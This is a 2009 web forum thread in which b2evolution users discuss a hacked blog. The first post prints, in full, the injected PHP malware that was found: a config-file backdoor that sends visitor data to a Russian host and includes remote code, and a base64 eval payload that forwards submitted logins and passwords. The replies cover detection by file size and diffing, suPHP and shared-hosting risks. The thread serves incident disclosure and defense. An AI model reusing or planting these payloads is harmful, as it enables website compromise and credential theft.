Recent Topics

1 Apr 26, 2009 02:06    

A couple days ago one of my client's blogs was hacked.
The script sends some info on bebdfzzazbzgj.users.phpinclude.ru ( Russian hackers are mad and hungry :) )

The script also created randomly named php files in each subdir of the /media directory.

Dear b2evo users, please check your conf/_basic_config.php for malicious code and report back if you found anything suspicious!

This is what I found in conf/basic_config.php (optimized for easy reading)

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);

$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
$path = base64_decode("aHR0cDovLw==")."bebdfzzazbzgj".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str;

if((include_once($path)))
{
	
}
else
{
	include_once($path);
}

One of the files from /media directory:

<?php error_reporting(0);$p="bebdfzzazbzgj";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgd
mFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciA
kbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPS
AwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBh
cnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW
5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3
NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnI
D0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3R
pb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5
vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcig
kbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmd
W5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3
BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMt
Pm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZ
TsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob
3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuY
W1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9
zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1
cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzL
T5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncG
F0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID
0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWz
BdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpI
HsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBv
cygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh
0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udG
V4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2
QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0c
mVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRw
JywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J1
0pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRle
HQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW5
0JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2
NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY
29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ1
0pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRle
HQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdH
J1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPm
Nvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvb
m5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRi
eXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJ
yb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZW
FtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGl
zLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ
5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0a
GlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMo
JHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZW
FtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0
dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7I
HJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkg
bW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2Nvbn
RleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0
aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcg
OiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHR
oaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudC
ddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4
gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y
29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVk
KSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9
pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3a
GVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGV
sbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCg
pIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZi
AoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAk
YyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTs
gJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy
0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSd
dKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuM
CcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudD
ogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIW
VtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1
snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBp
ZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc
1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsa
WNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIH
sgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhd
Glvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZG
Vyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCd
dKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZ
Sc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iL
CAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZ
XR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiB
md3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBm
YWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3Bvbn
NlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaX
MtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9
uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScs
ICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZ
WFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID
0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZS
AoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRp
b246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdH
JfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfS
AkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfS
B0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nO
iAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZ
WFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0
aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19
sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudW
xsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRy
aW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlb
XB0eSgkZGF0YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXR
hLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICc
pICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdH
JfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB
9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIH
sgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2
UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkY
XRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPn
N0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW
9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZm
dldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0g
Pj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLi
RoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZ
iAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ
1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuI
GZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdC
gpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN
0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW
9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZG
lyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXI
oKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyBy
ZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3
MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKS
B7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBz
dHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh
0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCg
kY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKG
lzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZ
ihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2
U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUob
WQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU
1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9
aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO
30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1L
jInLCc+PScpKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskc
mtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ
2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD
0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd
3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V
0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRf
U0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSS
SJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAa
W5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2
KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJy
wnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZG
UoImFIUjBjREk2THk4PSIpLiR2KSl7fX0=")); ?>

2 Apr 26, 2009 03:26

Some questions, if I may.

Was the file size noticeably different? For example my conf/_basic_config.php file is 4716 bytes according to my FTP program. Obviously that number changes from installation to installation, but if the hacked one was way off that then file size is a good clue for those with concerns.

Was the file CHMOD'd to facilitate installation? I'm pretty sure the manual says to change permissions to something so that b2evolution can write the values it needs if you want to edit the file during the installation process, but (last I looked), did not tell you to change it back after you were done installing.

Any other info that might help shed light on this? For example PHP version? Not that I know *why* those might be issues ... just that it comes up in this type of situation.

Oh and do you suppose SuPHP (I'm pretty sure that's the name of the thing) can protect someone against this? I had a malicious activity once, but it only affected directories I had opened to 777. Both my host and fplanque came up with SuPHP around the same time. A feather in both their caps eh? Not that users can go magically install that, but users MIGHT want to shop around for a host with it IF it can protect them against malicious activity.

3 Apr 26, 2009 03:44

Was the file size noticeably different? For example my conf/_basic_config.php file is 4716 bytes according to my FTP program.

The infected file was around 6 kb (original file content + the first block I posted above). A good start is to check the file modification date, and of course open if in text editor afterwards just in case :)

Was the file CHMOD'd to facilitate installation?

Probably, but sure not to 777. Maybe 666 or 644

Any other info that might help shed light on this? For example PHP version?

PHP 4.4.6
MySQL 4.1.22-standard

Oh and do you suppose SuPHP (I'm pretty sure that's the name of the thing) can protect someone against this?

I think it's installed, not sure about this.

4 Apr 26, 2009 03:51

sam2kb wrote:

Oh and do you suppose SuPHP (I'm pretty sure that's the name of the thing) can protect someone against this?

I think it's installed, not sure about this.

I wonder how one could learn if their server has it or not? I know I have it because the host told me in response to my problem, but I can't for the life of me find where to SEE that it is installed.

5 Apr 26, 2009 03:56

Check the system tab in b2evo admin.
PHP running as USER: XXX
PHP running as GROUP: XXX

Their should be something unique, with numbers.

6 Apr 26, 2009 05:37

Thanks for the heads up Sam.

Nothing on my 3.1 though I had malicious scripts in the previous 2# version.

I would love to have SuPHP but I have to have a Virtual Private Server to get it with my host. :(

My System tabs say..
PHP running as USER: apache (uid 48)
PHP running as GROUP: apache (gid 48)
PHP version 5.2.4

7 Apr 26, 2009 05:41

I meant something like this
PHP running as USER: user_12345
PHP running as GROUP: user_12345

8 Apr 26, 2009 05:53

Cool. I was looking for a way to find out from the outside but I guess not. phpinfo says nothing about it - to the best of my abilities to interpret that stuff.

9 Apr 26, 2009 13:26

It would be interesting why/how the code could be injected in the first place - I hope this isn't a vulnerability in the b2evolution core.

What Plugins do you have installed?

//edit: I wrote a little script to compare an b2evo installation with the fresh/unmodified b2evo files. [url=http://tblue.pastebin.com/f1edbe8f6]Get it here[/url].
To use it, you of course need the fresh b2evo files (download a release and unzip it). Then execute my script (you may want to redirect the output to a file):

php diff.php -d your_b2evo_dir original_files

It will show something like this:

NEW - ../blogs/plugins/http_BL_plugin/_http_BL.plugin.php
MODIFIED - ../blogs/conf/_advanced.php vs. ../b2evo-release/new/b2evolution/blogs/conf/_advanced.php
--- ../b2evo-release/new/b2evolution/blogs/conf/_advanced.php	2008-01-23 17:44:28.000000000 +0100
+++ ../blogs/conf/_advanced.php	2009-04-02 22:52:47.000000000 +0200
@@ -30,7 +30,7 @@
  *
  * @global integer
  */
-$debug = 0;
+$debug = 1;
 
 // Most of the time you'll want to see all errors, including notices:
 // b2evo should run notice free! (plugins too!)

"NEW" indicates that the file was added to your directory (doesn't exist in the fresh directory). If you don't know the file, check it...
"MODIFIED" means the file has been modified - the differences are displayed.

I've only tested the script on Linux, but it should run everywhere where PHP runs. You'll also need the "diff" utility.

//edit2: OK, to compare two directories you could also simply use diff(1). Weird I haven't thought about that (tired?). :|

10 Apr 26, 2009 17:44

I think a hacker somehow stole an FTP login/pass and modified the files. There is only one user (admin) in that blog.

feed_importer_plugin
stw_webshots_plugin

I hope this isn't a vulnerability in the b2evolution core.

I don't think it is.

11 May 26, 2009 22:34

This kind of hacks happens on lousy shared hosts that do not use suphp.

Every client on the servers runs their php scripts under the same user ID. So if you leave one of your files writable (like the conf file), any other user on the server can modify it by running a php script in his own hosting account that is on the same server. They do not even need your username and password!!!

Here's how they operate: they signup with a stolen credit card. Then they hack all the other accounts on the same server. Then a couple of hours their account gets cancelled because of credit card fraud. nut they don't care bc they already infected everyone on the server.

You have 3 solutions for this not to happen to you:
- do not use shared hosting. But dedicated is expensive.
- be paranoid and change the permissions of all your files & folders. But you won't be able to upload images either.
- use a DECENT web hosting provider. Seriously, all major & serious web hosts use suphp now which gives you a break with those permissions issues. You don't even need to worry about them anymore. List of decent hosts:
http://b2evolution.net/web-hosting/


Form is loading...